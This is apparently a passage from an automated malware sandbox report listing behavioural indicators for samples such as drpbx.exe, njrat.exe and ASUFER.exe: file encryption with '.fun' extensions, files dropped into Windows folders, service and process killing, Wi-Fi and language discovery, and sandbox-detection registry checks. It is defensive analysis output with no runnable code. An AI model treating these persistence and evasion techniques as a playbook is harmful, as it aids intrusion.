Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-96.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailWideTile.scale-150.png drpbx.exe File created C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_1.0.36.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSplashScreen.scale-100_altform-colorful.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\OutlookMailWideTile.scale-400.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12827.20400.0_x64__8wekyb3d8bbwe\images\TXP_3color_Hotel_378_Dark.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2103.1172.0_x64__8wekyb3d8bbwe\Assets\FeedbackHubAppList.targetsize-256_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\contrast-black\PowerAutomateWide310x150Logo.scale-150.png drpbx.exe File created C:\Program Files\7-Zip\Lang\nl.txt.fun drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.2008.32311.0_x64__8wekyb3d8bbwe\Assets\contrast-black\GetHelpAppList.targetsize-36_altform-unplated_contrast-black.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_1.0.6.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherAppList.targetsize-30_altform-lightunplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.targetsize-16_altform-unplated.png drpbx.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1909.12456.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.targetsize-40_altform-lightunplated.png drpbx.exe -
Drops file in Windows directory 52 IoCs
Processes:
tt.exeASUFER.exewmild.exenjrat.exerundll32.exechrome.exelofsawd.exe11.exea.exesetup.exesetup.execmd.exedescription ioc process File opened for modification C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\windows\ehome ASUFER.exe File created C:\Windows\ehome\SER.bat ASUFER.exe File opened for modification C:\Windows\ehome\SER.bat ASUFER.exe File created C:\Windows\ehome\instsrv.exe ASUFER.exe File created C:\Windows\ehome\subin.exe ASUFER.exe File created C:\Windows\ehome\wmild.exe ASUFER.exe File created C:\Windows\ehome\SURFSET.exe wmild.exe File opened for modification C:\Windows\rundll32.exe njrat.exe File opened for modification C:\Windows\rundll32.exe rundll32.exe File created C:\Windows\ehome\__tmp_rar_sfx_access_check_240643640 ASUFER.exe File opened for modification C:\Windows\ehome\readcac.exe ASUFER.exe File created C:\Windows\ehome\sc.exe ASUFER.exe File opened for modification C:\Windows\ehome\subin.exe ASUFER.exe File created C:\Windows\ehome\DNS.bat ASUFER.exe File opened for modification C:\Windows\ehome\DPS.bat ASUFER.exe File opened for modification C:\Windows\ehome\wmild.exe ASUFER.exe File opened for modification C:\Windows\ehome\N13 ASUFER.exe File created C:\Windows\rundll32.exe njrat.exe File opened for modification C:\Windows\ehome\sDPS.bat ASUFER.exe File created C:\Windows\ehome\cmsdll.exe ASUFER.exe File created C:\Windows\ehome\readcac.exe ASUFER.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Tasks\Test Task17.job lofsawd.exe File opened for modification C:\Windows\ehome\nobuf.vbs ASUFER.exe File opened for modification C:\Windows\ehome\DNS.bat ASUFER.exe File created C:\Windows\ehome\DPS.bat ASUFER.exe File created C:\Windows\ehome\sDPS.bat ASUFER.exe File created C:\Windows\ehome\SETA.bat ASUFER.exe File opened for modification C:\Windows\ehome\cmsdll.exe ASUFER.exe File created C:\Windows\ehome\N13 ASUFER.exe File created C:\Windows\ehome\ser.reg ASUFER.exe File created C:\Windows\ehome\ar.ocx ASUFER.exe File opened for modification C:\Windows\sysarddrvs.exe 11.exe File created C:\Windows\sysvplervcs.exe a.exe File created C:\Windows\ehome\amsql.exe ASUFER.exe File opened for modification C:\Windows\ehome\amsql.exe ASUFER.exe File opened for modification C:\Windows\ehome\instsrv.exe ASUFER.exe File opened for modification C:\Windows\ehome\sc.exe ASUFER.exe File opened for modification C:\Windows\SystemTemp\Crashpad\settings.dat setup.exe File created C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\ehome\SETA.bat ASUFER.exe File opened for modification C:\Windows\ehome\ser.reg ASUFER.exe File created C:\Windows\ehome\nobuf.vbs ASUFER.exe File opened for modification C:\Windows\ehome\ar.ocx ASUFER.exe File opened for modification C:\Windows\ehome\SURFSET.exe wmild.exe File opened for modification C:\Windows\SystemTemp setup.exe File opened for modification C:\Windows\SystemTemp\Crashpad\metadata setup.exe File created C:\windows\ehome\SETUPER.bat cmd.exe File opened for modification C:\windows\ehome\SETUPER.bat cmd.exe File created C:\Windows\sysarddrvs.exe 11.exe File opened for modification C:\Windows\sysvplervcs.exe a.exe -
Launches sc.exe 22 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 5040 sc.exe 4460 sc.exe 5876 sc.exe 3960 sc.exe 1260 sc.exe 5496 sc.exe 5168 sc.exe 4468 sc.exe 1064 sc.exe 2872 sc.exe 196 sc.exe 6496 sc.exe 6780 sc.exe 5068 sc.exe 2480 sc.exe 5956 sc.exe 2052 sc.exe 6028 sc.exe 1616 sc.exe 6120 sc.exe 2964 sc.exe 8776 sc.exe -
Detects Pyinstaller 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Files\networks_profile.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\B68B.tmp.zx.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3508 4732 WerFault.exe Statement-415322024.exe 2860 5408 WerFault.exe q1wnx5ir.exe 6740 6700 WerFault.exe 12.exe 6904 6856 WerFault.exe kitty.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
sysvplervcs.exesmell-the-roses.exetaskkill.exereg.exereg.exe11.exesc.exe1280732738.exe3320025174.exereg.exereg.exereg.exereg.exetaskkill.exepowershell.exejcuqdd.exereg.exetaskkill.exesc.exesc.exesc.exesc.exeJAVA_V3.exereg.exenet.exereg.exetaskkill.exesoftina.exeAsyncClient.exe606615002.exej86piuq9.exetaskkill.exereg.exesubin.exereg.exett.execmd.exetaskkill.exenjrat.exesc.exepowershell.exenet1.exepowershell.exetaskkill.exereg.exeStatement-415322024.exeITplan.exenet1.exetaskkill.exepowershell.exea.exesc.exe881826859.exe128037285.execookie250.exesc.exetaskkill.execmd.exesc.exepowershell.exesc.exeJAVA_V3.exesc.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysvplervcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language smell-the-roses.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1280732738.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3320025174.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jcuqdd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JAVA_V3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language softina.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 606615002.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language j86piuq9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language subin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language njrat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Statement-415322024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ITplan.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 881826859.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 128037285.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cookie250.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JAVA_V3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 3 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
Processes:
cmd.exenetsh.exenetsh.exepid process 7052 cmd.exe 2268 netsh.exe 3400 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
mstsc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\Device Parameters mstsc.exe Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters mstsc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\TSRedirFlags mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\Device Parameters mstsc.exe Key security queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters mstsc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags mstsc.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 6768 timeout.exe 6200 timeout.exe 7840 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
chrome.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 11 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4160 taskkill.exe 4960 taskkill.exe 3428 taskkill.exe 3964 taskkill.exe 5832 taskkill.exe 2252 taskkill.exe 2360 taskkill.exe 2328 taskkill.exe 128 taskkill.exe 3636 taskkill.exe 4728 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
Processes:
chrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760150374903805" chrome.exe -
Modifies registry class 64 IoCs
Processes:
chrome.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616193" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" 